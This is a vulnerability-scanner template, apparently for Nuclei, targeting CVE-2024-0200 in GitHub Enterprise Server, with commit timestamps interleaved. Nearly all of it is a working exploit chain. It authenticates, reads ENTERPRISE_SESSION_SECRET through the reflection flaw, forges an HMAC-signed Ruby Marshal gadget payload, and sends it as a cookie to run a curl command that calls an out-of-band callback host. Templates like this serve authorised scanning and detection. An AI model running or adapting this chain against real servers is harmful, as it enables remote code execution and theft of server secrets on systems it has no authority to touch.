2024-05-09 11:09:50 +00:00
id : CVE-2024-0200
info :
name : Github Enterprise Authenticated Remote Code Execution
author : iamnoooob,rootxharsh,pdresearch
severity : critical
description : |
2024-05-09 11:14:16 +00:00
An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.
2024-05-09 11:09:50 +00:00
reference :
- https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/
- https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/
- https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5
- https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3
- https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2024-0200
cwe-id : CWE-470
2024-05-31 19:23:20 +00:00
epss-score : 0.06844
epss-percentile : 0.93885
2024-05-09 11:09:50 +00:00
cpe : cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
metadata :
2024-05-31 19:23:20 +00:00
verified : true
2024-06-07 10:04:29 +00:00
max-request : 7
2024-05-09 11:09:50 +00:00
vendor : github
2024-06-07 10:04:29 +00:00
product : "enterprise_server"
shodan-query :
- "title:\"GitHub Enterprise\""
- micro focus dsd
fofa-query : "app=\"Github-Enterprise\""
2024-05-09 11:09:50 +00:00
tags : cve,cve2024,rce,github,enterprise
variables :
username : "{{username}}"
password : "{{password}}"
oast : "curl {{interactsh-url}}/?"
padstr : "{{randstr}}"
payload : '{{padding(oast,padstr,300)}}'
marshal_data : '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT'
b64_marshal_data : "{{base64(url_decode(marshal_data))}}"
digest : "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}"
2024-05-09 11:14:16 +00:00
final_payoad : "{{ b64_marshal_data + '--' + digest}}"
2024-05-09 11:09:50 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/api/v3/user/orgs"
headers :
Authorization : "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
extractors :
- type : json
part : body
name : org_name
internal : true
json :
- ".[].login"
- method : GET
path :
- "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"
headers :
Authorization : "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
matchers-condition : and
matchers :
- type : word
words :
- '"role": "admin"'
part : body
- method : POST
path :
- "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"
headers :
Content-Type : application/json
Authorization : "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
body : |
{
"name": "{{randstr}}"
}
matchers :
- type : status
status :
- 201
- method : GET
cookie-reuse : true
path :
- "{{BaseURL}}/login"
extractors :
- type : regex
part : body
internal : true
group : 1
regex :
- 'name="authenticity_token" value="(.*?)"'
name : csrf_token
- method : POST
path :
- "{{BaseURL}}/session"
headers :
Content-Type : application/x-www-form-urlencoded
body : |
login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&
matchers :
- type : status
status :
- 302
- type : word
words :
- "_gh_render"
part : header
- method : GET
path :
- "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"
extractors :
- type : regex
group : 1
name : ghe_secret
internal : true
regex :
- '"ENTERPRISE_SESSION_SECRET"=>"([^"]+?)"'
part : body
matchers :
- type : word
words :
- 'ENTERPRISE_SESSION_SECRET'
part : body
- method : GET
path :
- "{{BaseURL}}/"
headers :
Cookie : _gh_render={{final_payoad}}
matchers-condition : and
matchers :
- type : status
status :
- 500
- type : word
part : interactsh_protocol
words :
- "dns"
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022100b55f6b1a271d5853e4388a493b7db6672febea3697dcd0649fbaf6c2538dcefc02201397c08ed2ecd60f4aac71bcf61b1f0b7e66f84146464a70ec4d9f7584e5725b:922c64590222798bb761d5b6d8e72950